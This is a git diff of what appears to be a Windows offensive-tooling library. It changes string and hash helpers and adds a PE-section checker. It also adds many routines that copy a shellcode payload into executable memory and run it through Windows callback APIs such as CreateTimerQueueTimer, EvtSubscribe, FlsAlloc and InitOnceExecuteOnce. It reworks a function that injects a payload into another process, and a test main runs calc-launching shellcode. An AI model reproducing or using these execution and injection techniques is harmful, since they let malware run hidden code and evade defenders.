||||
INT Length = (INT)StringLengthA(String);
|
||||
UINT64 hash = ((UINT64)Length) << 56;
|
||||
PCHAR end = String + Length - (Length % sizeof(UINT64));
|
||||
PCHAR end = (PCHAR)String + Length - (Length % sizeof(UINT64));
|
||||
INT left = Length & 7;
|
||||
|
||||
UINT64 m;
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
UINT32 HashStringSuperFastHashA(_In_ PCHAR String)
|
||||
UINT32 HashStringSuperFastHashA(_In_ LPCSTR String)
|
||||
{
|
||||
INT Length = (INT)StringLengthA(String);
|
||||
UINT32 Hash = Length;
|
||||
|
@ -56,7 +56,7 @@ UINT32 HashStringSuperFastHashA(_In_ PCHAR String)
|
|||
return Hash;
|
||||
}
|
||||
|
||||
UINT32 HashStringSuperFastHashW(_In_ PWCHAR String)
|
||||
UINT32 HashStringSuperFastHashW(_In_ LPCWSTR String)
|
||||
{
|
||||
INT Length = (INT)StringLengthW(String);
|
||||
UINT32 Hash = Length;
|
||||
|
|
|
@ -1,12 +1,12 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
INT HashStringUnknownGenericHash1A(_In_ PCHAR String)
|
||||
INT HashStringUnknownGenericHash1A(_In_ LPCSTR String)
|
||||
{
|
||||
PCHAR Pointer;
|
||||
INT Generic;
|
||||
INT Hash = 0;
|
||||
|
||||
for (Pointer = String; *Pointer != '\0'; Pointer++)
|
||||
for (Pointer = (PCHAR)String; *Pointer != '\0'; Pointer++)
|
||||
{
|
||||
Hash = (Hash << 4) + (INT)(*Pointer);
|
||||
Generic = Hash & 0xF0000000L;
|
||||
|
@ -20,13 +20,13 @@ INT HashStringUnknownGenericHash1A(_In_ PCHAR String)
|
|||
return Hash;
|
||||
}
|
||||
|
||||
INT HashStringUnknownGenericHash1W(_In_ PWCHAR String)
|
||||
INT HashStringUnknownGenericHash1W(_In_ LPCWSTR String)
|
||||
{
|
||||
PWCHAR Pointer;
|
||||
INT Generic;
|
||||
INT Hash = 0;
|
||||
|
||||
for (Pointer = String; *Pointer != '\0'; Pointer++)
|
||||
for (Pointer = (PWCHAR)String; *Pointer != '\0'; Pointer++)
|
||||
{
|
||||
Hash = (Hash << 4) + (INT)(*Pointer);
|
||||
Generic = Hash & 0xF0000000L;
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL IsPathValidA(_In_ PCHAR FilePath)
|
||||
BOOL IsPathValidA(_In_ LPCSTR FilePath)
|
||||
{
|
||||
HANDLE hFile = INVALID_HANDLE_VALUE;
|
||||
|
||||
|
@ -14,7 +14,7 @@ BOOL IsPathValidA(_In_ PCHAR FilePath)
|
|||
return TRUE;
|
||||
}
|
||||
|
||||
BOOL IsPathValidW(_In_ PWCHAR FilePath)
|
||||
BOOL IsPathValidW(_In_ LPCWSTR FilePath)
|
||||
{
|
||||
HANDLE hFile = INVALID_HANDLE_VALUE;
|
||||
|
||||
|
|
|
@ -0,0 +1,108 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL IsPeSectionW(_In_ LPCWSTR PathToBinary, _In_ LPCWSTR PeSectionName)
|
||||
{
|
||||
BOOL bFlag = FALSE;
|
||||
HANDLE hHandle = INVALID_HANDLE_VALUE;
|
||||
PBYTE Buffer = NULL;
|
||||
LONGLONG SizeOfTargetBinary = 0L;
|
||||
|
||||
PIMAGE_DOS_HEADER Dos = NULL;
|
||||
PIMAGE_NT_HEADERS Nt = NULL;
|
||||
PIMAGE_FILE_HEADER File = NULL;
|
||||
PIMAGE_OPTIONAL_HEADER Optional = NULL;
|
||||
|
||||
PIMAGE_SECTION_HEADER Section = NULL;
|
||||
PIMAGE_SECTION_HEADER SectionHeaderArray = NULL;
|
||||
|
||||
CHAR SectionName[32] = { 0 };
|
||||
|
||||
if (WCharStringToCharString(SectionName, (PWCHAR)PeSectionName, StringLengthW(PeSectionName)) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
SizeOfTargetBinary = GetFileSizeFromPathW((PWCHAR)PathToBinary, FILE_ATTRIBUTE_NORMAL);
|
||||
if (SizeOfTargetBinary == INVALID_FILE_SIZE)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hHandle = CreateFileW(PathToBinary, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
|
||||
if (hHandle == INVALID_HANDLE_VALUE)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Buffer = (PBYTE)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, SizeOfTargetBinary);
|
||||
if (Buffer == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!ReadFile(hHandle, Buffer, SizeOfTargetBinary, NULL, NULL))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &Buffer))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
SectionHeaderArray = (PIMAGE_SECTION_HEADER)(ULONGLONG(Nt) + sizeof(IMAGE_NT_HEADERS));
|
||||
for (DWORD dwX = 0; dwX < File->NumberOfSections; dwX++)
|
||||
{
|
||||
if (StringCompareA((PCHAR)SectionHeaderArray[dwX].Name, SectionName) == ERROR_SUCCESS)
|
||||
bFlag = TRUE;
|
||||
}
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (Buffer)
|
||||
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, Buffer);
|
||||
|
||||
if (hHandle)
|
||||
CloseHandle(hHandle);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL IsPeSectionA(_In_ LPCSTR PathToBinary, _In_ LPCSTR PeSectionName)
|
||||
{
|
||||
BOOL bFlag = FALSE;
|
||||
HANDLE hHandle = INVALID_HANDLE_VALUE;
|
||||
PBYTE Buffer = NULL;
|
||||
LONGLONG SizeOfTargetBinary = 0L;
|
||||
|
||||
PIMAGE_DOS_HEADER Dos = NULL;
|
||||
PIMAGE_NT_HEADERS Nt = NULL;
|
||||
PIMAGE_FILE_HEADER File = NULL;
|
||||
PIMAGE_OPTIONAL_HEADER Optional = NULL;
|
||||
|
||||
PIMAGE_SECTION_HEADER Section = NULL;
|
||||
PIMAGE_SECTION_HEADER SectionHeaderArray = NULL;
|
||||
|
||||
SizeOfTargetBinary = GetFileSizeFromPathW((PWCHAR)PathToBinary, FILE_ATTRIBUTE_NORMAL);
|
||||
if (SizeOfTargetBinary == INVALID_FILE_SIZE)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hHandle = CreateFileA(PathToBinary, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
|
||||
if (hHandle == INVALID_HANDLE_VALUE)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Buffer = (PBYTE)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, SizeOfTargetBinary);
|
||||
if (Buffer == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!ReadFile(hHandle, Buffer, SizeOfTargetBinary, NULL, NULL))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!RtlLoadPeHeaders(&Dos, &Nt, &File, &Optional, &Buffer))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
SectionHeaderArray = (PIMAGE_SECTION_HEADER)(ULONGLONG(Nt) + sizeof(IMAGE_NT_HEADERS));
|
||||
for (DWORD dwX = 0; dwX < File->NumberOfSections; dwX++)
|
||||
{
|
||||
if (StringCompareA((PCHAR)SectionHeaderArray[dwX].Name, PeSectionName) == ERROR_SUCCESS)
|
||||
bFlag = TRUE;
|
||||
}
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (Buffer)
|
||||
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, Buffer);
|
||||
|
||||
if (hHandle)
|
||||
CloseHandle(hHandle);
|
||||
|
||||
return bFlag;
|
||||
}
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
#include <psapi.h>
|
||||
|
||||
BOOL IsProcessRunningA(_In_ PCHAR ProcessNameWithExtension)
|
||||
BOOL IsProcessRunningA(_In_ LPCSTR ProcessNameWithExtension)
|
||||
{
|
||||
HANDLE hProcess = NULL;
|
||||
|
||||
|
@ -43,7 +43,7 @@ BOOL IsProcessRunningA(_In_ PCHAR ProcessNameWithExtension)
|
|||
return FALSE;
|
||||
}
|
||||
|
||||
BOOL IsProcessRunningW(_In_ PWCHAR ProcessNameWithExtension)
|
||||
BOOL IsProcessRunningW(_In_ LPCWSTR ProcessNameWithExtension)
|
||||
{
|
||||
HANDLE hProcess = NULL;
|
||||
|
||||
|
|
|
@ -4,10 +4,13 @@ INT main(VOID)
|
|||
{
|
||||
PCHAR Buffer = NULL;
|
||||
DWORD dwSize = 0;
|
||||
HMODULE hMod = NULL;
|
||||
|
||||
Buffer = GenericShellcodeHelloWorldMessageBoxA(&dwSize);
|
||||
Buffer = GenericShellcodeOpenCalcExitThread(&dwSize);
|
||||
|
||||
MpfSceViaMessageBoxIndirectW((PBYTE)Buffer, dwSize);
|
||||
//MpfPiControlInjection((PBYTE)Buffer, dwSize, 19768);
|
||||
|
||||
//MpfSceViaInitOnceExecuteOnce((PBYTE)Buffer, dwSize);
|
||||
|
||||
if (Buffer)
|
||||
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, Buffer);
|
||||
|
|
|
@ -17,7 +17,7 @@ BOOL MpfPiControlInjection(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes, _I
|
|||
HANDLE hHandle = NULL;
|
||||
LPVOID BaseAddress = NULL;
|
||||
INPUT Input = { 0 };
|
||||
BOOL bFlag = FALSE;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hNtdll = GetModuleHandleEx2W(L"ntdll.dll");
|
||||
hKernelbase = GetModuleHandleEx2W(L"kernelbase.dll");
|
||||
|
@ -47,20 +47,30 @@ BOOL MpfPiControlInjection(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes, _I
|
|||
if (GetConsoleProcessList(ConsoleAttachList, 2) < 2)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (ConsoleAttachList[0] != GetCurrentProcessIdFromTeb())
|
||||
if (ConsoleAttachList[0] != GetCurrentProcessId())
|
||||
ParentId = ConsoleAttachList[0];
|
||||
else
|
||||
ParentId = ConsoleAttachList[1];
|
||||
|
||||
FreeConsole();
|
||||
AttachConsole(TargetProcessId);
|
||||
if (!FreeConsole())
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hWindow = GetConsoleWindow();
|
||||
if (!AttachConsole(TargetProcessId))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
FreeConsole();
|
||||
AttachConsole(ParentId);
|
||||
hWindow = (HWND)GetPeb()->ProcessParameters->ConsoleHandle;
|
||||
if (hWindow == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!FreeConsole())
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!AttachConsole(ParentId))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hHandle = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, TargetProcessId);
|
||||
if (hHandle == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
BaseAddress = VirtualAllocEx(hHandle, NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BaseAddress == NULL)
|
||||
|
|
|
@ -0,0 +1,48 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeCertFindChainInStoreCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
/*
|
||||
|
||||
HCERTSTORE hCertStore = NULL;
|
||||
CERT_CHAIN_FIND_ISSUER_PARA Issuer = { 0 };
|
||||
|
||||
hCertStore = CertOpenStore(CERT_STORE_PROV_SYSTEM, 0, NULL, CERT_SYSTEM_STORE_CURRENT_USER, L"My");
|
||||
if (hCertStore == NULL)
|
||||
return;
|
||||
|
||||
Issuer.cbSize = sizeof(CERT_CHAIN_FIND_ISSUER_PARA);
|
||||
Issuer.pfnFindCallback = (PFN_CERT_CHAIN_FIND_BY_ISSUER_CALLBACK)lpParameter;
|
||||
|
||||
CertFindChainInStore(hCertStore, X509_ASN_ENCODING, 0, CERT_CHAIN_FIND_BY_ISSUER, &Issuer, NULL);
|
||||
|
||||
if(hCertStore)
|
||||
CertCloseStore(hCertStore, 0);
|
||||
|
||||
*/
|
||||
}
|
||||
|
||||
BOOL MpfSceViaCertFindChainInStore(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
/*
|
||||
|
||||
|
||||
!!! UNIMPLEMENTED - UNABLE TO GET SHELLCODE EXECUTION WORKING!!!
|
||||
|
||||
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeCertFindChainInStoreCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
|
||||
*/
|
||||
|
||||
return FALSE;
|
||||
}
|
|
@ -0,0 +1,56 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeCreateThreadpoolWaitCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
/*
|
||||
|
||||
HANDLE hEvent;
|
||||
PTP_WAIT Wait = NULL;
|
||||
|
||||
hEvent = CreateEventW(NULL, FALSE, FALSE, NULL);
|
||||
if (hEvent == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Wait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)lpParameter, NULL, NULL);
|
||||
if(Wait == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
SetThreadpoolWait(Wait, hEvent, 0);
|
||||
|
||||
SetEvent(hEvent);
|
||||
|
||||
WaitForThreadpoolWaitCallbacks(Wait, FALSE);
|
||||
|
||||
SetEvent(hEvent);
|
||||
|
||||
Sleep(10000); //arbitrary sleep time...
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hEvent)
|
||||
CloseHandle(hEvent);
|
||||
|
||||
return;
|
||||
|
||||
*/
|
||||
}
|
||||
|
||||
BOOL MpfSceViaCreateThreadpoolWait(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
/*
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeCreateThreadpoolWaitCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
|
||||
*/
|
||||
|
||||
return FALSE;
|
||||
}
|
|
@ -0,0 +1,47 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeCreateTimerQueueTimerCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
HANDLE Timer = NULL, Queue = NULL, Event = NULL;
|
||||
|
||||
Queue = CreateTimerQueue();
|
||||
if (Queue == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Event = CreateEventW(NULL, TRUE, FALSE, NULL);
|
||||
if (Event == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!CreateTimerQueueTimer(&Timer, Queue, (WAITORTIMERCALLBACK)lpParameter, NULL, 100, 0, 0))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
WaitForSingleObject(Event, INFINITE);
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (Event)
|
||||
CloseHandle(Event);
|
||||
|
||||
#pragma warning( push )
|
||||
#pragma warning( disable : 6031)
|
||||
if(Queue)
|
||||
DeleteTimerQueue(Queue);
|
||||
#pragma warning( pop )
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
BOOL MpfSceViaCreateTimerQueueTimer(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeCreateTimerQueueTimerCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,23 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeCryptEnumOIDInfoCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
CryptEnumOIDInfo(NULL, NULL, NULL, (PFN_CRYPT_ENUM_OID_INFO)lpParameter);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaCryptEnumOIDInfo(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeCryptEnumOIDInfoCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,37 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeDSA_EnumCallbackCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
HDSA hDSA = NULL;
|
||||
|
||||
hDSA = DSA_Create(1, 1);
|
||||
if (hDSA == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (DSA_InsertItem(hDSA, 0x7ffffff, &hDSA) == -1)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
DSA_EnumCallback(hDSA, (PFNDAENUMCALLBACK)lpParameter, NULL);
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if(hDSA)
|
||||
DSA_Destroy(hDSA);
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
BOOL MpfSceViaDSA_EnumCallback(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeDSA_EnumCallbackCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,33 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEnumPropsExWCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
/*
|
||||
|
||||
THIS FUNCTION FAILS- NOTE
|
||||
|
||||
GetTopWindow function (winuser.h)
|
||||
|
||||
If the function succeeds, the return value is a handle to the child window at the top
|
||||
of the Z order. If the specified window has no child windows, the return value is NULL.
|
||||
To get extended error information, use the GetLastError function.
|
||||
|
||||
*/
|
||||
|
||||
EnumPropsExW(GetTopWindow(NULL), (PROPENUMPROCEXW)lpParameter, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEnumPropsExW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEnumPropsExWCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,37 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeEvtSubscribeCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
EVT_HANDLE hEvent = NULL;
|
||||
|
||||
hEvent = EvtSubscribe(NULL, NULL, L"Application", L"*[System/EventID=1]", NULL, NULL, (EVT_SUBSCRIBE_CALLBACK)lpParameter, EvtSubscribeToFutureEvents);
|
||||
if (hEvent == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (CveEventWrite(L"2022-123456", L"Pseudo-random-string") != ERROR_SUCCESS)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Sleep(10000); //arbitrary sleep time..
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if(hEvent)
|
||||
EvtClose(hEvent);
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
BOOL MpfSceViaEvtSubscribe(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeEvtSubscribeCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,28 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeFlsAllocCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
DWORD dwIndex = ERROR_SUCCESS;
|
||||
|
||||
dwIndex = FlsAlloc((PFLS_CALLBACK_FUNCTION)lpParameter);
|
||||
if (dwIndex == FLS_OUT_OF_INDEXES)
|
||||
return;
|
||||
|
||||
FlsSetValue(dwIndex, (PVOID)"Data");
|
||||
|
||||
}
|
||||
|
||||
BOOL MpfSceViaFlsAlloc(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeFlsAllocCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeImmEnumInputContextCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
ImmEnumInputContext(NULL, (IMCENUMPROC)lpParameter, NULL);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaImmEnumInputContext(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeImmEnumInputContextCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,24 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeInitOnceExecuteOnceCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
INIT_ONCE InitOnce = INIT_ONCE_STATIC_INIT;
|
||||
PVOID Context;
|
||||
|
||||
InitOnceExecuteOnce(&InitOnce, (PINIT_ONCE_FN)lpParameter, NULL, &Context);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaInitOnceExecuteOnce(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeInitOnceExecuteOnceCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -1,13 +1,13 @@
|
|||
#include "StringManipulation.h"
|
||||
|
||||
PWCHAR StringConcatW(_Inout_ PWCHAR String, _In_ PWCHAR String2)
|
||||
PWCHAR StringConcatW(_Inout_ PWCHAR String, _In_ LPCWSTR String2)
|
||||
{
|
||||
StringCopyW(&String[StringLengthW(String)], String2);
|
||||
|
||||
return String;
|
||||
}
|
||||
|
||||
PCHAR StringConcatA(_Inout_ PCHAR String, _In_ PCHAR String2)
|
||||
PCHAR StringConcatA(_Inout_ PCHAR String, _In_ LPCSTR String2)
|
||||
{
|
||||
StringCopyA(&String[StringLengthA(String)], String2);
|
||||
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
#include "StringManipulation.h"
|
||||
|
||||
PCHAR StringCopyA(_Inout_ PCHAR String1, _In_ PCHAR String2)
|
||||
PCHAR StringCopyA(_Inout_ PCHAR String1, _In_ LPCSTR String2)
|
||||
{
|
||||
PCHAR p = String1;
|
||||
|
||||
|
@ -9,7 +9,7 @@ PCHAR StringCopyA(_Inout_ PCHAR String1, _In_ PCHAR String2)
|
|||
return String1;
|
||||
}
|
||||
|
||||
PWCHAR StringCopyW(_Inout_ PWCHAR String1, _In_ PWCHAR String2)
|
||||
PWCHAR StringCopyW(_Inout_ PWCHAR String1, _In_ LPCWSTR String2)
|
||||
{
|
||||
PWCHAR p = String1;
|
||||
|
||||
|
|
|
@ -9,10 +9,11 @@ PCHAR SecureStringCopyA(_Inout_ PCHAR String1, _In_ LPCSTR String2, _In_ SIZE_T
|
|||
PWCHAR SecureStringCopyW(_Inout_ PWCHAR String1, _In_ LPCWSTR String2, _In_ SIZE_T Size);
|
||||
INT StringCompareA(_In_ LPCSTR String1, _In_ LPCSTR String2);
|
||||
INT StringCompareW(_In_ LPCWSTR String1, _In_ LPCWSTR String2);
|
||||
PWCHAR StringConcatW(_Inout_ PWCHAR String, _In_ PWCHAR String2);
|
||||
PCHAR StringConcatA(_Inout_ PCHAR String, _In_ PCHAR String2);
|
||||
PCHAR StringCopyA(_Inout_ PCHAR String1, _In_ PCHAR String2);
|
||||
PWCHAR StringCopyW(_Inout_ PWCHAR String1, _In_ PWCHAR String2);
|
||||
PWCHAR StringConcatW(_Inout_ PWCHAR String, _In_ LPCWSTR String2);
|
||||
PCHAR StringConcatA(_Inout_ PCHAR String, _In_ LPCSTR String2);
|
||||
PCHAR StringCopyA(_Inout_ PCHAR String1, _In_ LPCSTR String2);
|
||||
PWCHAR StringCopyW(_Inout_ PWCHAR String1, _In_ LPCWSTR String2);
|
||||
//todo
|
||||
PCHAR StringFindSubstringA(_In_ PCHAR String1, _In_ PCHAR String2);
|
||||
PWCHAR StringFindSubstringW(_In_ PWCHAR String1, _In_ PWCHAR String2);
|
||||
SIZE_T StringLengthA(_In_ LPCSTR String);
|
||||
|
|
|
@ -131,6 +131,7 @@
|
|||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="AddSectionToPeFile.cpp" />
|
||||
<ClCompile Include="AdfCloseHandleOnInvalidAddress.cpp" />
|
||||
<ClCompile Include="AdfIsCreateProcessDebugEventCodeSet.cpp" />
|
||||
<ClCompile Include="AdfOpenProcessOnCsrss.cpp" />
|
||||
|
@ -168,6 +169,7 @@
|
|||
<ClCompile Include="ExceptHandlerCallbackRoutine.cpp" />
|
||||
<ClCompile Include="Ex_GetHandleOnDeviceHttpCommunication.cpp" />
|
||||
<ClCompile Include="FastcallExecuteBinaryShellExecuteEx.cpp" />
|
||||
<ClCompile Include="IsPeSection.cpp" />
|
||||
<ClCompile Include="MiscGenericShellcodePayloads.cpp" />
|
||||
<ClCompile Include="GetByteArrayFromFile.cpp" />
|
||||
<ClCompile Include="GetCurrentDirectoryFromUserProcessParameters.cpp" />
|
||||
|
@ -258,6 +260,11 @@
|
|||
<ClCompile Include="MpfSceViaCDefFolderMenu_Create2.cpp" />
|
||||
<ClCompile Include="MpfSceViaCertEnumSystemStore.cpp" />
|
||||
